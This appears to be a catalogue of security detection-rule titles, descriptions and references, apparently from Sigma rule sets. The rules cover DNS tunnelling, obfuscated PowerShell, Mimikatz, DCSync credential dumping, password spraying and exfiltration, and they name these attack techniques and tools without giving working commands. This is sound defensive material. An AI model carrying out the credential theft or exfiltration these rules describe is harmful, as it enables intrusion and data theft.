Use of Debugfs to Access a Raw Disk Detects access to a raw disk on a host to evade detection by security products. https://twitter.com/0xm1rch/status/1600857731073654784?s=20&t=MdrBPqv4hnBEfAJBayMCZA, https://github.com/Neo23x0/auditd/blob/master/audit.rules
OMIGOD SCX RunAsProvider ExecuteScript Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell. Script being executed gets created as a temp file in /tmp folder with a scx* prefix. Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/. The file in that directory has the same prefix scx*. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager. Microsoft Azure, and Microsoft Operations Management Suite. https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://censys.io/blog/understanding-the-impact-of-omigod-cve-2021-38647/, https://github.com/Azure/Azure-Sentinel/pull/3071/files
Failed Logins with Different Accounts from Single Source - Linux Detects suspicious failed logins with different user accounts from a single source system None
Privilege Escalation Preparation Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/, https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/, https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml
Possible DNS Tunneling Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data. https://zeltser.com/c2-dns-tunneling/, https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/
High DNS Bytes Out High DNS queries bytes amount from host per short period of time None
High NULL Records Requests Rate Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution None
High DNS Requests Rate High DNS requests amount from host per short period of time None
High DNS subdomain requests rate per domain High rate of unique Fully Qualified Domain Names (FQDN) requests per root domain (eTLD+1) in short period of time None
High TXT Records Requests Rate Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution None
Large domain name request Detects large DNS domain names None
High DNS Bytes Out - Firewall High DNS queries bytes amount from host per short period of time None
High DNS Requests Rate - Firewall High DNS requests amount from host per short period of time None
Network Scans Count By Destination IP Detects many failed connection attempts to different ports or hosts None
Possible DNS Rebinding Detects DNS-answer with TTL <10. https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325
Network Scans Count By Destination Port Detects many failed connection attempts to different ports or hosts None
Multiple Modsecurity Blocks Detects multiple blocks by the mod_security module (Web Application Firewall) None
Multiple Suspicious Resp Codes Caused by Single Client Detects possible exploitation activity or bugs in a web application None
Invoke-Obfuscation CLIP+ Launcher Detects Obfuscated use of Clip.exe to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Obfuscated IEX Invocation Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework (See reference section for code block) https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888
Invoke-Obfuscation STDIN+ Launcher Detects Obfuscated use of stdin to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Possible DNS Rebinding Detects several different DNS-answers by one domain with IPs from internal and external networks. Normally, DNS-answer contain TTL >100. (DNS-record will saved in host cache for a while TTL). https://medium.com/@brannondorsey/attacking-private-networks-from-the-internet-with-dns-rebinding-ea7098a2d325
Invoke-Obfuscation VAR+ Launcher Detects Obfuscated use of Environment Variables to execute PowerShell https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation COMPRESS OBFUSCATION Detects Obfuscated Powershell via COMPRESS OBFUSCATION https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation RUNDLL LAUNCHER Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Stdin Detects Obfuscated Powershell via Stdin in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Clip Detects Obfuscated Powershell via use Clip.exe in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use MSHTA Detects Obfuscated Powershell via use MSHTA in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION Detects Obfuscated Powershell via VAR++ LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Meterpreter or Cobalt Strike Getsystem Service Installation Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/
Tap Driver Installation Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques None
File Creation by Office Applications This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Mimikatz In-Memory Detects certain DLL loads when Mimikatz gets executed https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/
Execution via CL_Invocation.ps1 (2 Lines) Detects Execution via SyncInvoke in CL_Invocation.ps1 module https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424
Execution via CL_Mutexverifiers.ps1 (2 Lines) Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/, https://twitter.com/pabraeken/status/995111125447577600
Silence.Downloader V3 Detects Silence downloader. These commands are hardcoded into the binary. None
Automated Turla Group Lateral Movement Detects automated lateral movement by Turla group https://securelist.com/the-epic-turla-operation/65545/
DNSCat2 Powershell Implementation Detection Via Process Creation The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally. https://github.com/lukebaggett/dnscat2-powershell, https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html, https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html
Reconnaissance Activity Using BuiltIn Commands Detects execution of a set of builtin commands often used in recon stages by different attack groups https://twitter.com/haroonmeer/status/939099379834658817, https://twitter.com/c_APT_ure/status/939475433711722497, https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
Quick Execution of a Series of Suspicious Commands Detects multiple suspicious process in a limited timeframe https://car.mitre.org/wiki/CAR-2013-04-002
MSI Spawned Cmd and Powershell Spawned Processes This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg, https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
Always Install Elevated Parent Child Correlated This rule will looks any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg
Files Dropped to Program Files by Non-Priviledged Process Search for dropping of files to Windows/Program Files fodlers by non-priviledged processes https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-37-638.jpg
Stored Credentials in Fake Files Search for accessing of fake files with stored credentials https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-13-638.jpg
Dumping ntds.dit remotely via DCSync ntds.dit retrieving using synchronisation with legitimate domain controller using Directory Replication Service Remote Protocol https://twitter.com/gentilkiwi/status/1003236624925413376, https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Dumping ntds.dit remotely via NetSync ntds.dit retrieving (only computer accounts) using synchronisation with legit domain controller using Netlogon Remote Protocol https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Windows Kernel and 3rd-Party Drivers Exploits Token Stealing Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment
Malicious Service Installations Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. https://awakesecurity.com/blog/threat-hunting-for-paexec/, https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html, https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf
Metasploit Or Impacket Service Installation Via SMB PsExec Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation https://bczyz1.github.io/2021/01/30/psexec.html
Detection of Possible Rotten Potato Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/
Remote Schtasks Creation Detects remote execution via scheduled task creation or update on the destination host https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
Enumeration via the Global Catalog Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width. https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156
Rare Schtasks Creations Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code None
Password Spraying via Explicit Credentials Detects a single user failing to authenticate to multiple users using explicit credentials. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Multiple Users Failing to Authenticate from Single Process Detects failed logins with multiple accounts from a single process on the system. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying, https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing
Failed Logins with Different Accounts from Single Source System Detects suspicious failed logins with different user accounts from a single source system None
Failed NTLM Logins with Different Accounts from Single Source System Detects suspicious failed logins with different user accounts from a single source system None
Valid Users Failing to Authenticate From Single Source Using Kerberos Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Disabled Users Failing To Authenticate From Source Using Kerberos Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Invalid Users Failing To Authenticate From Source Using Kerberos Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Valid Users Failing to Authenticate from Single Source Using NTLM Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Invalid Users Failing To Authenticate From Single Source Using NTLM Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Multiple Users Remotely Failing To Authenticate From Single Source Detects a source system failing to authenticate against a remote host with multiple users. https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying
Suspicious Multiple File Rename Or Delete Occurred Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity). https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html
Possible Remote Password Change Through SAMR Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see this events. None
Suspicious Werfault.exe Network Connection Outbound Adversaries can migrate cobalt strike/metasploit/C2 beacons on compromised systems to legitimate werfault.exe process to avoid detection. https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/
Failed Mounting of Hidden Share Detects repeated failed (outgoing) attempts to mount a hidden share https://twitter.com/moti_b/status/1032645458634653697, https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5
Rare Service Installations Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services None
Rare Scheduled Task Creations This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names. None
Domain User Enumeration Network Recon 01 Domain user and group enumeration via network reconnaissance. Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller. The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29 https://github.com/OTRF/detection-hackathon-apt29, https://github.com/OTRF/detection-hackathon-apt29/issues/37
Potential Exfiltration of Compressed Files This rule detects potential exfiltration by looking for a few compression extensions in the uri and signs of compression in the mime type, file type, and http body https://github.com/OTRF/detection-hackathon-apt29/issues/17